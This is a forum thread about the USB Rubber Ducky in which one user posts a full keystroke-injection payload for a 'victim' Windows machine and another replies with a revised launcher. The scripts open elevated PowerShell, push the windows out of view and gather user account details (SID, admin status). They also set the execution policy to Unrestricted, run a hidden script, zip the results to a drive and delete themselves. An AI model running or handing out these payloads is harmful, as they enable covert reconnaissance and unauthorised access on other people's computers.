Jump to content

Default payloads not working properly

Saylor

By Saylor
in Classic USB Rubber Ducky

 Share

Recommended Posts

Saylor Newbie

Saylor

Posted
Posted

Hey you.

I've just received my rubber ducky and I thought I'd give one of the generated payloads a go. My victim computer is a 64bit Win10 machine and I selected User information and save to this computer as the components of my script.

After it's finished executing, the destination folder does have the Report.zip file in it but the file is empty. I don't even know where to start debugging this, so I'd really appreciate a nudge in the right direction. My keyboard layout is German, so I've selected Germany in the script generator as well and it seems to be using the German keys correctly (since the ALT+Y presses do work out fine).

Link to comment
Share on other sites
Saylor Newbie

Saylor

Posted
  • Author
Posted
1 hour ago, xcoder said:

recheck your script
you can post it here and I will check it for you

Thank you!

Here it is: 

DELAY 750
GUI r
DELAY 1000
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 750
ALT y
DELAY 750
ENTER
ALT SPACE
DELAY 1000
STRING m
DELAY 1000
DOWNARROW
REPEAT 100
ENTER
STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')
ENTER
STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime
ENTER
STRING $fileSaveDir = New-Item  ($userDir) -ItemType Directory 
ENTER
STRING $date = get-date 
ENTER
STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>"
ENTER
STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' 
ENTER
STRING $Report = $Report + "<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>" 
ENTER
STRING $UserInfo = Get-WmiObject -class Win32_UserAccount -namespace root/CIMV2 | Where-Object {$_.Name -eq $env:UserName}| Select AccountType,SID,PasswordRequired  
ENTER 
STRING $UserType = $UserInfo.AccountType 
ENTER
STRING $UserSid = $UserInfo.SID
ENTER  
STRING $UserPass = $UserInfo.PasswordRequired 
ENTER 
STRING $IsAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator') 
ENTER 
STRING $Report =  $Report + "<div id=left><h3>User Information</h3><br><table><tr><td>Current User Name:</td><td>$env:USERNAME</td></tr><tr><td>Account Type:</td><td> $UserType</td></tr><tr><td>User SID:</td><td>$UserSid</td></tr><tr><td>Account Domain:</td><td>$env:USERDOMAIN</td></tr><tr><td>Password Required:</td><td>$UserPass</td></tr><tr><td>Current User is Admin:</td><td>$IsAdmin</td></tr></table>" 
ENTER  
STRING $Report = $Report + '</div>' 
ENTER
STRING $Report >> $fileSaveDir'/ComputerInfo.html' 
ENTER
STRING function copy-ToZip($fileSaveDir){ 
ENTER 
STRING $srcdir = $fileSaveDir 
ENTER
STRING $zipFile = 'E:\\Report.zip'
ENTER
STRING if(-not (test-path($zipFile))) { 
ENTER
STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))
ENTER 
STRING (dir $zipFile).IsReadOnly = $false} 
ENTER
STRING $shellApplication = new-object -com shell.application
ENTER 
STRING $zipPackage = $shellApplication.NameSpace($zipFile) 
ENTER
STRING $files = Get-ChildItem -Path $srcdir 
ENTER 
STRING foreach($file in $files) { 
ENTER
STRING $zipPackage.CopyHere($file.FullName) 
ENTER 
STRING while($zipPackage.Items().Item($file.name) -eq $null){ 
ENTER
STRING Start-sleep -seconds 1 }}} 
ENTER 
STRING copy-ToZip($fileSaveDir) 
ENTER
STRING remove-item $fileSaveDir -recurse 
ENTER
STRING Remove-Item $MyINvocation.InvocationName 
ENTER
CTRL s
DELAY 750    
STRING C:\Windows\config-21642.ps1
ENTER
DELAY 1000
ALT F4 
DELAY 750  
GUI r 
DELAY 500 
STRING powershell Start-Process cmd -Verb runAs 
ENTER
DELAY 1000
ALT y 
DELAY 750   
STRING mode con:cols=14 lines=1 
ENTER
ALT SPACE 
DELAY 750  
STRING m 
DELAY 1000
DOWNARROW 
REPEAT 100
ENTER
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false 
ENTER 
DELAY 750  
STRING powershell.exe -windowstyle hidden -File C:\Windows\config-21642.ps1
ENTER

In the payload gen, I entered E:\ as the destination folder.

Link to comment
Share on other sites
xcoder Newbie

xcoder

Posted
Posted (edited) 
DEFAULT_DELAY 100
DELAY 5000
GUI r
DELAY 100
STRING cmd /Q /D /T:FE /F:OFF /V:ON /K mode con lines=1 cols=10
ENTER
DELAY 200
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set usb=%d
ENTER
DELAY 300
STRING %usb%
ENTER
DELAY 200
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER
DELAY 200
STRING powershell.exe -File %usb%\config-21642.ps1
ENTER
DELAY 200
STRING Exit
ENTER

Rubber Ducky  Twin Duck Firmware
Your PowerShell inside [USB FLASH DISK]  config-21642.ps1

Edited by xcoder
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...